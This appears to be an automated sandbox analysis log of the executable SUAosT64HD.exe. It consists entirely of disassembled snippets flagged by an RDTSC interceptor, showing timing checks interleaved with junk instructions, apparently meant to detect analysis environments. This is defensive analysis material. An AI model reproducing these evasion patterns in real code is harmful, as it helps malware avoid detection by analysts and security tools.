Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B776A second address: 6B778F instructions: 0x00000000 rdtsc 0x00000002 je 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC350C3E728h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B778F second address: 6B77AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5388h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B77AB second address: 6B77D1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jo 00007FC350C3E720h 0x00000016 pushad 0x00000017 jnc 00007FC350C3E716h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7908 second address: 6B7925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC3507E5385h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7A57 second address: 6B7A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E724h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7A79 second address: 6B7A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7A7D second address: 6B7A83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7A83 second address: 6B7AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC3507E5382h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7AB2 second address: 6B7AD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FC350C3E724h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7AD5 second address: 6B7ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7B64 second address: 6B7B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7CB7 second address: 6B7CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC3507E5376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7CC1 second address: 6B7CD7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007FC350C3E71Eh 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7CD7 second address: 6B7D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FC3507E5378h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov edx, dword ptr [ebp+122D3825h] 0x00000026 push 00000004h 0x00000028 sub cx, 9BF0h 0x0000002d nop 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC3507E537Fh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8108 second address: 6B810C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B810C second address: 6B8141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+12478FDCh], ecx 0x0000000e mov dword ptr [ebp+122D2151h], edx 0x00000014 push 0000001Eh 0x00000016 call 00007FC3507E5380h 0x0000001b movsx edx, bx 0x0000001e pop edi 0x0000001f push eax 0x00000020 jl 00007FC3507E5384h 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8141 second address: 6B8145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8248 second address: 6B824D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B83AC second address: 6B83E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007FC350C3E723h 0x0000000c pop ebx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 jmp 00007FC350C3E71Ch 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B83E1 second address: 6B83F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B84CB second address: 6B84D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B84D1 second address: 6B8545 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FC3507E5382h 0x00000010 lea eax, dword ptr [ebp+1247BDE8h] 0x00000016 jmp 00007FC3507E5381h 0x0000001b nop 0x0000001c jnc 00007FC3507E537Eh 0x00000022 push eax 0x00000023 jc 00007FC3507E5384h 0x00000029 jmp 00007FC3507E537Eh 0x0000002e nop 0x0000002f mov edx, dword ptr [ebp+122D2A33h] 0x00000035 lea eax, dword ptr [ebp+1247BDA4h] 0x0000003b jc 00007FC3507E5378h 0x00000041 mov ecx, esi 0x00000043 nop 0x00000044 pushad 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B8545 second address: 6A2717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC350C3E71Dh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FC350C3E725h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jne 00007FC350C3E716h 0x0000001f popad 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007FC350C3E718h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c sub dword ptr [ebp+12470066h], ebx 0x00000042 call dword ptr [ebp+122D34EFh] 0x00000048 pushad 0x00000049 push eax 0x0000004a jmp 00007FC350C3E71Bh 0x0000004f pop eax 0x00000050 jmp 00007FC350C3E726h 0x00000055 push eax 0x00000056 push edx 0x00000057 jng 00007FC350C3E716h 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2744 second address: 6F2749 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2749 second address: 6F2763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E71Dh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC350C3E716h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F28F6 second address: 6F28FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F28FA second address: 6F2902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2902 second address: 6F2908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2908 second address: 6F2923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Eh 0x00000007 jp 00007FC350C3E716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C28 second address: 6F2C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC3507E5376h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C34 second address: 6F2C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C38 second address: 6F2C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3507E5386h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C5C second address: 6F2C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C60 second address: 6F2C6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FC3507E5376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C6A second address: 6F2C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C75 second address: 6F2C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2C7D second address: 6F2C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F2EE8 second address: 6F2EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F305D second address: 6F306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F306B second address: 6F3081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F8EAE second address: 6F8EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC350C3E71Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F788E second address: 6F7897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F7897 second address: 6F78B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC350C3E71Eh 0x0000000c jc 00007FC350C3E716h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F78B2 second address: 6F78B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F7B93 second address: 6F7B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F7E28 second address: 6F7E34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F83DA second address: 6F83DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F83DF second address: 6F83E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F8533 second address: 6F8537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F86D6 second address: 6F86DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F86DC second address: 6F870E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC350C3E726h 0x0000000b jbe 00007FC350C3E716h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jc 00007FC350C3E716h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F8876 second address: 6F887E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6F887E second address: 6F8898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E720h 0x00000009 jo 00007FC350C3E716h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702E70 second address: 702E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702E76 second address: 702E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702E7A second address: 702E8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FC3507E5376h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702E8B second address: 702E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC350C3E71Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702E98 second address: 702EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702EA0 second address: 702EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702EA4 second address: 702EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702EA8 second address: 702ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC350C3E716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FC350C3E71Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC350C3E71Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702ED3 second address: 702ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702A45 second address: 702A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702A49 second address: 702A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 702A4F second address: 702A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7060E6 second address: 70610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC3507E5376h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3507E5381h 0x00000012 jnc 00007FC3507E5376h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 70B6EF second address: 70B6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 6B7FAA second address: 6B7FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 70BF4B second address: 70BF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 70BF4F second address: 70BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 70BF55 second address: 70BF82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC350C3E72Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FC350C3E716h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 70C0EE second address: 70C11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC3507E5376h 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FC3507E5382h 0x00000015 jnc 00007FC3507E5376h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 70E3B1 second address: 70E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 712083 second address: 712087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 712087 second address: 71209A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FC350C3E716h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 71209A second address: 7120C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC3507E5376h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FC3507E5387h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7120C2 second address: 7120C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 719FF9 second address: 71A029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC3507E5387h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 71A029 second address: 71A031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 718323 second address: 718336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC3507E5378h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 718336 second address: 71835B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC350C3E716h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FC350C3E71Ah 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 719728 second address: 71974A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC3507E5376h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC3507E5384h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 71974A second address: 719760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FC350C3E716h 0x0000000e jnc 00007FC350C3E716h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 719CF5 second address: 719D1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3507E5389h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 723C07 second address: 723C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
